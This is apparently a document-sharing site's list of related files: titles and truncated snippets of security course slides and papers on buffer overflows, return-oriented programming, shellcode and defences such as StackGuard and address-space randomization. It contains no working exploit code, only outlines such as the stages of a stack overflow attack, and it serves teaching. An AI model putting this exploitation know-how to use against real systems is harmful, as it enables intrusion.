Return oriented programming Return oriented programming TOOR - Computer Security Hallgrímur H. Gunnarsson Reykjavík University 2012-05-04 Introduction Many countermeasures have been introduced to foil EIP hijacking: W X: Prevent

More information

Outline. Memory Exploit

Outline. Memory Exploit Outline CS 6V81-05: System Security and Malicious Code Analysis Robust Shell Code Return Oriented Programming and HeapSpray Zhiqiang Lin Department of Computer Science University of Texas at Dallas April

More information

Software Security: Buffer Overflow Attacks (continued)

Software Security: Buffer Overflow Attacks (continued) CSE 484 / CSE M 584: Computer Security and Privacy Software Security: Buffer Overflow Attacks (continued) Spring 2015 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann,

More information

The geometry of innocent flesh on the bone: Return-into-libc without function calls (on the x86) Hovav Shacham presented by: Fabian Fäßler

The geometry of innocent flesh on the bone: Return-into-libc without function calls (on the x86) Hovav Shacham presented by: Fabian Fäßler The geometry of innocent flesh on the bone: Return-into-libc without function calls (on the x86) Hovav Shacham presented by: Fabian Fäßler return-oriented programming Hovav Shacham presented by: Fabian

More information

Assembly Language: Function Calls

Assembly Language: Function Calls Assembly Language: Function Calls 1 Goals of this Lecture Help you learn: Function call problems: Calling and returning Passing parameters Storing local variables Handling registers without interference

More information

Module: Return-oriented Programming. Professor Trent Jaeger. CSE543 - Introduction to Computer and Network Security

Module: Return-oriented Programming. Professor Trent Jaeger. CSE543 - Introduction to Computer and Network Security CSE543 - Introduction to Computer and Network Security Module: Return-oriented Programming Professor Trent Jaeger 1 Anatomy of Control-Flow Exploits 2 Anatomy of Control-Flow Exploits Two steps in control-flow

More information

CSE 127 Computer Security

CSE 127 Computer Security CSE 127 Computer Security Stefan Savage, Fall 2018, Lecture 4 Low Level Software Security II: Format Strings, Shellcode, & Stack Protection Review Function arguments and local variables are stored on the

More information

buffer overflow exploitation

buffer overflow exploitation buffer overflow exploitation Samuele Andreoli, Nicolò Fornari, Giuseppe Vitto May 11, 2016 University of Trento Introduction 1 introduction A Buffer Overflow is an anomaly where a program, while writing

More information

Secure Programming Lecture 6: Memory Corruption IV (Countermeasures)

Secure Programming Lecture 6: Memory Corruption IV (Countermeasures) Secure Programming Lecture 6: Memory Corruption IV (Countermeasures) David Aspinall, Informatics @ Edinburgh 2nd February 2016 Outline Announcement Recap Containment and curtailment Tamper detection Memory

More information

Software Security: Buffer Overflow Attacks

Software Security: Buffer Overflow Attacks CSE 484 / CSE M 584: Computer Security and Privacy Software Security: Buffer Overflow Attacks (continued) Autumn 2018 Tadayoshi (Yoshi) Kohno yoshi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann,

More information

Register Allocation, iii. Bringing in functions & using spilling & coalescing

Register Allocation, iii. Bringing in functions & using spilling & coalescing Register Allocation, iii Bringing in functions & using spilling & coalescing 1 Function Calls ;; f(x) = let y = g(x) ;; in h(y+x) + y*5 (:f (x

More information

CSE 127: Computer Security. Memory Integrity. Kirill Levchenko

CSE 127: Computer Security. Memory Integrity. Kirill Levchenko CSE 127: Computer Security Memory Integrity Kirill Levchenko November 18, 2014 Stack Buffer Overflow Stack buffer overflow: writing past end of a stackallocated buffer Also called stack smashing One of

More information

CSE 127 Computer Security

CSE 127 Computer Security CSE 127 Computer Security Stefan Savage, Spring 2018, Lecture 4 Low Level Software Security II: Format Strings, Shellcode, & Stack Protection Review Function arguments and local variables are stored on

More information

CNIT 127: Exploit Development. Ch 3: Shellcode. Updated

CNIT 127: Exploit Development. Ch 3: Shellcode. Updated CNIT 127: Exploit Development Ch 3: Shellcode Updated 1-30-17 Topics Protection rings Syscalls Shellcode nasm Assembler ld GNU Linker objdump to see contents of object files strace System Call Tracer Removing

More information

X86 Review Process Layout, ISA, etc. CS642: Computer Security. Drew Davidson

X86 Review Process Layout, ISA, etc. CS642: Computer Security. Drew Davidson X86 Review Process Layout, ISA, etc. CS642: Computer Security Drew Davidson davidson@cs.wisc.edu From Last Time ACL-based permissions (UNIX style) Read, Write, execute can be restricted on users and groups

More information

Advanced Buffer Overflow

Advanced Buffer Overflow Pattern Recognition and Applications Lab Advanced Buffer Overflow Ing. Davide Maiorca, Ph.D. davide.maiorca@diee.unica.it Computer Security A.Y. 2017/2018 Department of Electrical and Electronic Engineering

More information

Lecture 4 CIS 341: COMPILERS

Lecture 4 CIS 341: COMPILERS Lecture 4 CIS 341: COMPILERS CIS 341 Announcements HW2: X86lite Available on the course web pages. Due: Weds. Feb. 7 th at midnight Pair-programming project Zdancewic CIS 341: Compilers 2 X86 Schematic

More information

x86 assembly CS449 Fall 2017

x86 assembly CS449 Fall 2017 x86 assembly CS449 Fall 2017 x86 is a CISC CISC (Complex Instruction Set Computer) e.g. x86 Hundreds of (complex) instructions Only a handful of registers RISC (Reduced Instruction Set Computer) e.g. MIPS

More information

CS642: Computer Security

CS642: Computer Security Low- level soeware vulnerability protecgon mechanisms CS642: Computer Security Professor Ristenpart h9p://www.cs.wisc.edu/~rist/ rist at cs dot wisc dot edu University of Wisconsin CS 642 How can we help

More information

4. Jump to *RA 4. StackGuard 5. Execute code 5. Instruction Set Randomization 6. Make system call 6. System call Randomization

4. Jump to *RA 4. StackGuard 5. Execute code 5. Instruction Set Randomization 6. Make system call 6. System call Randomization 04/04/06 Lecture Notes Untrusted Beili Wang Stages of Static Overflow Solution 1. Find bug in 1. Static Analysis 2. Send overflowing input 2. CCured 3. Overwrite return address 3. Address Space Randomization

More information

CMPSC 497 Buffer Overflow Vulnerabilities

CMPSC 497 Buffer Overflow Vulnerabilities Systems and Internet Infrastructure Security Network and Security Research Center Department of Computer Science and Engineering Pennsylvania State University, University Park PA CMPSC 497 Buffer Overflow

More information

Buffer Overflow Attacks

Buffer Overflow Attacks Buffer Overflow Attacks 1. Smashing the Stack 2. Other Buffer Overflow Attacks 3. Work on Preventing Buffer Overflow Attacks Smashing the Stack An Evil Function void func(char* inp){ } char buffer[16];

More information

Inject malicious code Call any library functions Modify the original code

Inject malicious code Call any library functions Modify the original code Inject malicious code Call any library functions Modify the original code 2 Sadeghi, Davi TU Darmstadt 2012 Secure, Trusted, and Trustworthy Computing Chapter 6: Runtime Attacks 2 3 Sadeghi, Davi TU Darmstadt

More information

Software Vulnerabilities. Jeff Foster University of Maryland, College Park

Software Vulnerabilities. Jeff Foster University of Maryland, College Park Software Vulnerabilities Jeff Foster University of Maryland, College Park When is a Program Secure? When it does exactly what it should! But what is it supposed to do? - Someone tells us (do we trust them?)

More information

Q: Exploit Hardening Made Easy

Q: Exploit Hardening Made Easy Q: Exploit Hardening Made Easy E.J. Schwartz, T. Avgerinos, and D. Brumley. In Proc. USENIX Security Symposium, 2011. CS 6301-002: Language-based Security Dr. Kevin Hamlen Attacker s Dilemma Problem Scenario

More information

BUFFER OVERFLOW. Jo, Heeseung

BUFFER OVERFLOW. Jo, Heeseung BUFFER OVERFLOW Jo, Heeseung IA-32/LINUX MEMORY LAYOUT Heap Runtime stack (8MB limit) Dynamically allocated storage When call malloc(), calloc(), new() DLLs (shared libraries) Data Text Dynamically linked

More information

Buffer overflow is still one of the most common vulnerabilities being discovered and exploited in commodity software.

Buffer overflow is still one of the most common vulnerabilities being discovered and exploited in commodity software. Outline Morris Worm (1998) Infamous attacks Secure Programming Lecture 4: Memory Corruption II (Stack Overflows) David Aspinall, Informatics @ Edinburgh 23rd January 2014 Recap Simple overflow exploit

More information

Buffer Overflow. Jo, Heeseung

Buffer Overflow. Jo, Heeseung Buffer Overflow Jo, Heeseung IA-32/Linux Memory Layout Heap Runtime stack (8MB limit) Dynamically allocated storage When call malloc(), calloc(), new() DLLs (shared libraries) Data Text Dynamically linked

More information

Secure Programming Lecture 5: Memory Corruption III (Countermeasures)

Secure Programming Lecture 5: Memory Corruption III (Countermeasures) Secure Programming Lecture 5: Memory Corruption III (Countermeasures) David Aspinall, Informatics @ Edinburgh 1st February 2018 Memory corruption recap Buffer overflow is still one of the most common vulnerabilities

More information

idkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com idkwim.linknow.

idkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com idkwim.linknow. idkwim@gmail.com idkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com choicy90@nate.com (Nate-On) @idkwim idkwim.linknow.kr Zombie PC?? -> No! Return Oriented Programming

More information

Buffer overflow risks have been known for over 30 years. Is it still a problem? Try searching at to see.

Buffer overflow risks have been known for over 30 years. Is it still a problem? Try searching at to see. Memory corruption recap Other memory corruption errors Secure Programming Lecture 5: Memory Corruption III (Countermeasures) David Aspinall, Informatics @ Edinburgh 1st February 2018 Buffer overflow is

More information

On The Effectiveness of Address-Space Randomization. H. Shacham, M. Page, B. Pfaff, E.-J. Goh, N. Modadugu, and D. Boneh Stanford University CCS 2004

On The Effectiveness of Address-Space Randomization. H. Shacham, M. Page, B. Pfaff, E.-J. Goh, N. Modadugu, and D. Boneh Stanford University CCS 2004 On The Effectiveness of Address-Space Randomization H. Shacham, M. Page, B. Pfaff, E.-J. Goh, N. Modadugu, and D. Boneh Stanford University CCS 2004 Code-Injection Attacks Inject malicious executable code

More information

Buffer Overflow. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University

Buffer Overflow. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University Buffer Overflow Jin-Soo Kim (jinsookim@skku.edu) Computer Systems Laboratory Sungkyunkwan University http://csl.skku.edu IA-32/Linux Memory Layout Runtime stack (8MB limit) Heap Dynamically allocated storage

More information

Security Workshop HTS. LSE Team. February 3rd, 2016 EPITA / 40

Security Workshop HTS. LSE Team. February 3rd, 2016 EPITA / 40 Security Workshop HTS LSE Team EPITA 2018 February 3rd, 2016 1 / 40 Introduction What is this talk about? Presentation of some basic memory corruption bugs Presentation of some simple protections Writing

More information

CMSC 313 Lecture 12 [draft] How C functions pass parameters

CMSC 313 Lecture 12 [draft] How C functions pass parameters CMSC 313 Lecture 12 [draft] How C functions pass parameters UMBC, CMSC313, Richard Chang Last Time Stack Instructions: PUSH, POP PUSH adds an item to the top of the stack POP removes an

More information

CS 161 Computer Security

CS 161 Computer Security Paxson Spring 2011 CS 161 Computer Security Discussion 1 January 26, 2011 Question 1 Buffer Overflow Mitigations Buffer overflow mitigations generally fall into two categories: (i) eliminating the cause

More information

Control Hijacking Attacks

Control Hijacking Attacks Control Hijacking Attacks Alexandros Kapravelos kapravelos@ncsu.edu (Derived from slides from Chris Kruegel) Attacker s mindset Take control of the victim s machine Hijack the execution flow of a running

More information

Function Call Convention

Function Call Convention Function Call Convention Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch Content Intel Architecture Memory Layout

More information

Memory safety, continued

Memory safety, continued Memory safety, continued With material from Mike Hicks and Dave Levin http://images.myhardhatstickers.com/img/lg/h/everybody-safety-hard-hat-label-hh-0115.gif Last time More memory attacks Started: Principled

More information

Stack Vulnerabilities. CS4379/5375 System Security Assurance Dr. Jaime C. Acosta

Stack Vulnerabilities. CS4379/5375 System Security Assurance Dr. Jaime C. Acosta 1 Stack Vulnerabilities CS4379/5375 System Security Assurance Dr. Jaime C. Acosta Part 1 2 3 An Old, yet Still Valid Vulnerability Buffer/Stack Overflow ESP Unknown Data (unused) Unknown Data (unused)

More information

Lecture 9: Buffer Overflow* CS 392/6813: Computer Security Fall Nitesh Saxena

Lecture 9: Buffer Overflow* CS 392/6813: Computer Security Fall Nitesh Saxena Lecture 9: Buffer Overflow* CS 392/6813: Computer Security Fall 2007 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit) and Stanislav Nurilov Course Admin

More information

ISOLATION DEFENSES GRAD SEC OCT

ISOLATION DEFENSES GRAD SEC OCT ISOLATION DEFENSES GRAD SEC OCT 03 2017 ISOLATION Running untrusted code in a trusted environment Setting Possibly with multiple tenants OS: users / processes Browser: webpages / browser extensions Cloud:

More information
2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback